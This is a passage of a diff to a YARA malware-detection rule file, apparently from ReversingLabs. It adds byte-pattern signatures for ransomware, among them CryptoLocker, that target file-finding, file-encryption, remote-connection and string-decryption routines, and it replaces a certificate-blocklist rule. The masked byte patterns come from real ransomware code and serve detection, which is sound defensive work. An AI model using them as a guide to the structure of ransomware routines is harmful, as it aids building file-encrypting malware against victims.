+            FF 35 ?? ?? ?? ?? 85 FF 0F 44 F8 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 6A ?? 5E 6A ?? 68
+            ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? 89 75 ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ??
+            C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? 50 83 C1 ?? E8
+            ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ??
+            ?? ?? ?? 8D 4D ?? 89 5D ?? 89 75 ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50
+            8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 85 ?? ?? ?? ?? 50 83 C1 ?? E8 ?? ??
+            ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 8B F0 6A ??
+            68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? C7 45 ?? ?? ?? ?? ?? 88 5D ?? E8 ?? ??
+            ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 56 83 C1
+            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45
+            ?? 50 E8 ?? ?? ?? ?? 59 8B F0 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? C7
+            45 ?? ?? ?? ?? ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D
+            ?? E8 ?? ?? ?? ?? 8B 4D ?? 56 83 C1 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D
+            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? 57 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B F0 6A ?? 58 6A ?? 5F 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? 88 45 ?? 89 5D ?? 89 7D ??
+            88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ??
+            8B 4D ?? 56 83 C1 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8
+            ?? ?? ?? ?? 51 51 8B CC 89 65 ?? 8D 45 ?? 89 4D ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83
+            EC ?? C6 45 ?? ?? 8B CC 6A ?? 89 59 ?? 89 79 ?? 68 ?? ?? ?? ?? 88 19 E8
+        }
+		$encrypt_files_p1 = {
+            8B FB 89 5D ?? 89 7D ?? 89 5D ?? 8B 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? C6 45 ?? ?? 89
+            45 ?? 3B F0 74 ?? 56 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 3B DF 74 ??
+            8B 08 89 0F 8B 48 ?? 89 4F ?? 83 20 ?? 83 60 ?? ?? 83 C7 ?? 89 7D ?? EB ?? 50 57 8D
+            4D ?? E8 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? 83 7D ?? ?? C6 45 ?? ?? 0F 85 ?? ?? ?? ?? 6A
+            ?? 58 03 F0 3B 75 ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8B B5 ?? ?? ?? ??
+            C6 45 ?? ?? 8B 06 89 45 ?? EB ?? 8D 48 ?? 8D 41 ?? 50 51 68 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? C6 45 ?? ?? 3B DF 74 ?? 8B 08 89 0F 8B 48 ?? 89 4F ?? 83 20 ?? 83 60 ??
+            ?? 83 C7 ?? 89 7D ?? EB ?? 50 57 8D 4D ?? E8 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? 83 7D ??
+            ?? C6 45 ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 3B C6 75 ?? 8B 75
+            ?? EB ?? 83 7E ?? ?? 74 ?? 8B CE E8 ?? ?? ?? ?? 83 C6 ?? 3B F7 75 ?? 0F 57 C0 68 ??
+            ?? ?? ?? 66 0F 13 45 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? 6A ?? 59 99
+            F7 F9 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 8B 1D ?? ?? ?? ?? 8B
+            75 ?? 8B 7D ?? 89 45 ?? 3B D8 74 ?? 83 EC ?? 8B CC 53 83 61 ?? ?? 83 61 ?? ?? E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 03 F8 83 D6 ?? 6A ?? 58 03 D8 3B 5D ?? 75 ?? 0F AC
+            F7 ?? C1 EE ?? 56 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? 8B 35
+            ?? ?? ?? ?? EB ?? 83 7E ?? ?? 8B C6 72 ?? 8B 06 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 6A ?? 58 03 F0 3B F7 75 ?? 68 ?? ?? ?? ?? E8
+        }
+		$encrypt_files_p2 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 56 8B 75 ?? 8D 8D ?? ?? ?? ?? 57
+            56 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 33 DB 50 8D 45 ?? 89 5D ?? 50 E8 ?? ?? ?? ?? 59
+            59 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 6A ?? 89 59 ?? C7 41
+            ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 19 E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? 8A D8 E8 ?? ?? ?? ?? 84 DB 74 ?? 33 DB E9 ??
+            ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85
+            C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ??
+            ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 83 EC ?? 33 DB 8B CC 89 5D ?? 56 E8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 3B C1 0F 42 C8 3B C7 89
+            4D ?? 0F 42 F8 89 7D ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 39 9D ?? ?? ?? ?? 75 ?? 83 EC ?? 8B CC 56 E8 ?? ?? ??
+            ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 7E ?? ?? C6 45 ?? ?? 72 ?? 8B 36 E8
+            ?? ?? ?? ?? FF 30 E8 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 77 ?? 56 E8 ?? ?? ?? ?? 56 89 45 ?? E8 ?? ?? ??
+            ?? 8B 4D ?? 56 53 51 89 45 ?? E8 ?? ?? ?? ?? 56 53 FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ??
+            83 C4 ?? 89 5D ?? 8B D3 85 C0 0F 84 ?? ?? ?? ?? 8B C8 2B CA 39 4D ?? 8B C1 8B F1 0F
+            46 45 ?? 3B F9 89 45 ?? 0F 46 F7 8B 7D ?? 2B CE 89 75 ?? 39 4D ?? 0F 46 4D ?? 89 4D
+            ?? 85 FF 75 ?? 53 56 FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 0C 3E 8B
+        }
+		$encrypt_files_p3 = {
+            C4 89 4D ?? 89 08 8D 8D ?? ?? ?? ?? 89 58 ?? 89 58 ?? 89 58 ?? 89 58 ?? 89 58 ?? E8
+            ?? ?? ?? ?? 53 FF 75 ?? 8D 8D ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 FF 75
+            ?? 8D 8D ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 EC ?? 8B D4 8B D8
+            33 C0 03 CF 89 0A 8D 8D ?? ?? ?? ?? 89 42 ?? 89 42 ?? 89 42 ?? 89 42 ?? 89 42 ?? E8
+            ?? ?? ?? ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B 7D ?? 2B 75 ?? 03
+            7D ?? 56 57 E8 ?? ?? ?? ?? 59 59 6A ?? 56 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75
+            ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? 01 45 ?? 53 E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 83 C4 ?? 8B 40 ?? 8B 84 05 ?? ?? ?? ?? C1 E8 ?? A8 ?? 74 ?? 83 EC ??
+            8B CC FF 75 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 7E ?? ??
+            C6 45 ?? ?? 72 ?? 8B 36 E8 ?? ?? ?? ?? FF 30 E8 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 7D ??
+            89 55 ?? 6A ?? 5B 3B D0 0F 82 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ??
+            E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 59 FF 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 EC
+            ?? C6 45 ?? ?? 8B CC 6A ?? 89 59 ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 19 E8 ??
+            ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 8B 48 ?? C6 45 ?? ?? 72 ??
+            8B 00 51 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ??
+            8D 45 ?? 0F 43 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 50 89 59 ??
+            89 59 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? B3 ?? E8 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 59 59 8A D8 8D 4D ?? E8
+            ?? ?? ?? ?? 8B 4D ?? 8A C3 5F 5E 64 89 0D ?? ?? ?? ?? 5B C9 C3
+        }
+		$find_files = {
+            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 83 C8 ?? 57 8B 7D ??
+            41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
+            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
+            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4D ??
+            56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 C0 50
+            50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5
+            89 45 ?? 8B 4D ?? 53 8B 5D ?? 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
+            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA
+            ?? 75 ?? 8D 43 ?? 3B C8 74 ?? 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF
+            80 FA ?? 74 ?? 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41
+            F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ??
+            ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56
+            FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ??
+            2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9
+            74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
+            ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B
+            C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
+            ?? E9
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "D-LINK CORPORATION" and pe.signatures [ i ] . serial == "50:67:33:96:14:c5:cc:21:9c:48:9d:40:42:0f:3b:f9" and 1441238400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6E32531Ae83992F0573120A5E78De271 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cryptolocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects CryptoLocker ransomware."
 		author = "ReversingLabs"
-		id = "37fc58ea-63d4-569d-968f-f4775403b0bb"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "8cc3ac4b-9179-5e2c-97e1-65304f9dfe22"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1852-L1868"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.CryptoLocker.yara#L3-L154"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2b6d54ea8395c3666906b2e60c30b970c2c1b6f55ded874cbcc22dc79391fb34"
+		logic_hash = "08430b0c5689840d592bdda5dbc2ed06e0d0fa1e2c0f19aff4316580c6a0b23d"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "CryptoLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$file_loop_1 = {
+            55 8B EC 83 EC ?? 53 56 8B D9 57 89 5D ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 32 C9 83 7D ?? ?? 88 4D ?? 0F 86 45 01
+            00 00 8B 5D ?? 0F 57 C0 66 0F 13 45 ?? 84 C9 74 08 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 33 FF 15 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 75 ??
+            6A ?? 8B 49 ?? 6A ?? 52 56 8B 01 6A ?? 89 55 ?? 8B 00 FF D0 84 C0 0F 84 E6 00 00 00 FF 15 ?? ?? ?? ?? 8B 7D ?? 33 D2 89
+            45 ?? 8B D8 85 FF 72 18 77 08 81 FE ?? ?? ?? ?? 76 0E B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB 05 8B C6 89 7D ?? 3B D0 73
+            0F 8B 45 ?? 8D 0C 13 8B 40 ?? 88 0C 02 42 EB CC 8B 5D ?? 85 FF 8B FE 75 04 85 F6 74 6B 85 DB 77 0E 72 08 81 FF ?? ?? ??
+            ?? 73 04 8B F7 EB 05 BE ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 56 FF 70 ?? 8B 45 ?? FF 30 FF 15 ?? ?? ?? ?? 85 C0 74 ??
+            39 75 ?? 75 ?? 8B 45 ?? 2B FE 8B 55 ?? 83 DB ?? 2B D7 8B 48 ?? 8B 45 ?? 1B C3 50 8B 31 52 FF 75 ?? FF 75 ?? 8B 06 6A ??
+            FF D0 84 C0 74 34 85 DB 77 AD 72 04 85 FF 75 95 8B 5D ?? FF 33 FF 15 ?? ?? ?? ?? 8A 4D ?? FE C1 0F B6 C1 88 4D ?? 3B 45
+            ?? 0F 82 C6 FE FF FF B0 ?? 5F 5E 5B 8B E5 5D C2
+        }
+		$file_loop_2 = {
+            55 8B EC 83 EC ?? 53 56 8B D9 57 89 5D ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 32 C9 83 7D ?? ?? 88 4D ?? 0F 86 50 01
+            00 00 8B 5D ?? 0F 57 C0 66 0F 13 45 ?? 84 C9 74 08 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 33 FF 15 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 49 ??
+            8B 75 ?? 8B 01 6A ?? 8B 00 6A ?? 52 56 6A ?? 89 55 ?? FF D0 84 C0 0F 84 F1 00 00 00 FF 15 ?? ?? ?? ?? 8B 7D ?? 89 45 ??
+            33 D2 8B D8 85 FF 72 18 77 08 81 FE ?? ?? ?? ?? 76 0E B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB 05 8B C6 89 7D ?? 3B D0 73
+            10 8B 45 ?? 8D 0C 13 8B 40 ?? 42 88 4C 02 ?? EB CB 8B 5D ?? 85 FF 8B FE 75 04 85 F6 74 75 85 DB 77 11 72 08 81 FF ?? ??
+            ?? ?? 73 07 8B F7 89 5D ?? EB 0C BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 56 FF 70 ?? 8B 45 ?? FF
+            30 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 39 75 ?? 75 ?? 8B 45 ?? 8B 55 ?? 8B 48 ?? 8B 45 ?? 2B FE 8B 31 83 DB ?? 2B D7 1B C3 50
+            8B 06 52 FF 75 ?? FF 75 ?? 6A ?? FF D0 84 C0 74 34 85 DB 77 A6 72 04 85 FF 75 8B 8B 5D ?? FF 33 FF 15 ?? ?? ?? ?? 8A 4D
+            ?? FE C1 0F B6 C1 88 4D ?? 3B 45 ?? 0F 82 BB FE FF FF B0 ?? 5F 5E 5B 8B E5 5D C2
+        }
+		$file_loop_3 = {
+            55 8B EC 83 EC ?? 53 56 8B C1 57 89 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 62 01 00 00 8B 5D ?? 32 C0 0F 57 C0 88 45 ?? 66 0F
+            13 45 ?? EB 03 8D 49 ?? 84 C0 74 08 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 33 FF 15 ?? ?? ?? ?? 85 C0
+            0F 84 27 01 00 00 8D 45 ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 0F 84 13 01 00 00 8B 4D ?? 8B 55 ?? 8B 49 ?? 8B 75 ?? 8B 01
+            6A ?? 8B 00 6A ?? 52 56 6A ?? 89 55 ?? FF D0 84 C0 0F 84 EE 00 00 00 FF 15 ?? ?? ?? ?? 8B 7D ?? 89 45 ?? 33 D2 8B D8 90
+            85 FF 72 18 77 08 81 FE ?? ?? ?? ?? 76 0E B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB 05 8B C6 89 7D ?? 3B D0 73 10 8B 45 ??
+            8D 0C 13 8B 40 ?? 42 88 4C 02 ?? EB CB 8B 5D ?? 85 FF 8B FE 75 04 85 F6 74 75 85 DB 77 11 72 08 81 FF ?? ?? ?? ?? 73 07
+            8B F7 89 5D ?? EB 0C BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 56 FF 70 ?? 8B 45 ?? FF 30 FF 15 ??
+            ?? ?? ?? 85 C0 74 5E 39 75 ?? 75 59 8B 45 ?? 8B 55 ?? 8B 48 ?? 8B 45 ?? 2B FE 8B 31 83 DB ?? 2B D7 1B C3 50 8B 06 52 FF
+            75 ?? FF 75 ?? 6A ?? FF D0 84 C0 74 30 85 DB 77 A6 72 04 85 FF 75 8B 8B 5D ?? FF 33 FF 15 ?? ?? ?? ?? 8A 45 ?? FE C0 88
+            45 ?? 3C ?? 0F 82 BE FE FF FF B0 ?? 5F 5E 5B 8B E5 5D C2
+        }
+		$encrypt_data_1 = {
+            55 8B EC 56 8B 75 ?? 57 8B F9 39 75 ?? 73 09 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B 07 53 85 C0 74 58 48 83 F8 ?? 77 48 8B 5D ??
+            8B 45 ?? 3B D8 74 0B 56 50 53 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 45 ?? 89 75 ?? 50 8B 45 ?? 53 6A ?? 0F B6 C0 50 6A ??
+            FF 77 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA ?? 85 C0 5B 0F 44 CA 5F 8B C1 5E 5D C2 ?? ?? 5B 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B
+            47 ?? 33 D2 89 45 ?? 8B 47 ?? 85 F6 74 26 8B 7D ?? 8B DE 8B 4D ?? 8B F0 2B F9 8A 04 0F 8D 49 ?? 32 04 32 88 41 ?? 8D 42
+            ?? 33 D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5B 5F 8B C6 5E 5D C2
+        }
+		$encrypt_data_2 = {
+            55 8B EC 56 8B 75 ?? 57 8B F9 39 75 ?? 73 09 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B 07 53 85 C0 74 56 48 83 F8 ?? 77 46 8B 5D ??
+            8B 45 ?? 3B D8 74 0B 56 50 53 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 45 ?? 50 0F B6 45 ?? 53 6A ?? 50 6A ?? FF 77 ?? 89 75
+            ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA ?? 85 C0 5B 0F 44 CA 5F 8B C1 5E 5D C2 ?? ?? 5B 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B 47 ??
+            33 D2 89 45 ?? 8B 47 ?? 85 F6 74 26 8B 4D ?? 8B 7D ?? 8B DE 2B F9 8B F0 8A 04 0F 32 04 32 8D 49 ?? 88 41 ?? 8D 42 ?? 33
+            D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5B 5F 8B C6 5E 5D C2
+        }
+		$encrypt_data_3 = {
+            55 8B EC 53 56 8B 75 ?? 8B D9 39 75 ?? 72 4C 83 3B ?? 77 47 8B 45 ?? 57 8B 7D ?? 3B F8 74 0B 56 50 57 E8 ?? ?? ?? ?? 83
+            C4 ?? FF 75 ?? 8D 45 ?? 50 0F B6 45 ?? 57 6A ?? 50 6A ?? FF 73 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA ?? 85 C0 5F
+            0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 5E 83 C8 ?? 5B 5D C2
+        }
+		$decrypt_data_1 = {
+            55 8B EC 53 56 57 8B F9 8B 07 85 C0 74 53 48 83 F8 ?? 77 55 8B 75 ?? 39 75 ?? 72 4D 8B 5D ?? 8B 45 ?? 3B D8 74 0B 56 50
+            53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 89 75 ?? 50 8B 45 ?? 53 6A ?? 0F B6 C0 50 6A ?? FF 77 ?? FF 15 ?? ?? ?? ?? 8B 4D ??
+            83 CA ?? 85 C0 5F 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 8B 75 ?? 39 75 ?? 73 0A 5F 5E 83 C8 ?? 5B 5D C2 ?? ?? 8B 47 ?? 33 D2
+            89 45 ?? 8B 47 ?? 85 F6 74 28 8B 7D ?? 8B DE 8B 4D ?? 8B F0 2B F9 8B FF 8A 04 0F 8D 49 ?? 32 04 32 88 41 ?? 8D 42 ?? 33
+            D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5F 8B C6 5E 5B 5D C2
+        }
+		$decrypt_data_2 = {
+            55 8B EC 53 56 57 8B F9 8B 07 85 C0 74 51 48 83 F8 ?? 77 53 8B 75 ?? 39 75 ?? 72 4B 8B 5D ?? 8B 45 ?? 3B D8 74 0B 56 50
+            53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 0F B6 45 ?? 53 6A ?? 50 6A ?? FF 77 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA
+            ?? 85 C0 5F 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 8B 75 ?? 39 75 ?? 73 0A 5F 5E 83 C8 ?? 5B 5D C2 ?? ?? 8B 47 ?? 33 D2 89 45
+            ?? 8B 47 ?? 85 F6 74 2A 8B 4D ?? 8B 7D ?? 8B DE 2B F9 8B F0 8D 64 24 ?? 8A 04 0F 32 04 32 8D 49 ?? 88 41 ?? 8D 42 ?? 33
+            D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5F 8B C6 5E 5B 5D C2
+        }
+		$decrypt_data_3 = {
+            55 8B EC 53 8B D9 83 3B ?? 77 56 56 8B 75 ?? 39 75 ?? 73 09 5E 83 C8 ?? 5B 5D C2 ?? ?? 8B 45 ?? 57 8B 7D ?? 3B F8 74 0B
+            56 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 0F B6 45 ?? 57 6A ?? 50 6A ?? FF 73 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ??
+            83 CA ?? 85 C0 5F 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 83 C8 ?? 5B 5D C2
+        }
+		$decrypt_strings_1 = {
+            55 8B EC 53 56 8B D9 8B F2 57 33 C9 33 FF 2B DE 8B 45 ?? 8D 14 31 8A 04 07 02 C1 32 04 13 88 02 8D 47 ?? 33 D2 F7 75 ??
+            8B FA F6 C1 ?? 75 0B 8B C1 D1 E8 66 83 3C 46 ?? 74 03 41 EB D3 D1 E9 5F 5E 5B 8D 41 ?? 5D C3
+        }
+		$decrypt_strings_2 = {
+            55 8B EC 53 56 8B D9 57 8B F2 33 C9 33 FF 2B DE 8B 45 ?? 8D 14 31 8A 04 07 02 C1 32 04 13 88 02 8D 47 ?? 33 D2 F7 75 ??
+            8B FA F6 C1 ?? 75 0B 8B C1 D1 E8 66 83 3C 46 ?? 74 03 41 EB D3 5F D1 E9 5E 8D 41 ?? 5B 5D C3
+        }
+		$decrypt_1 = {
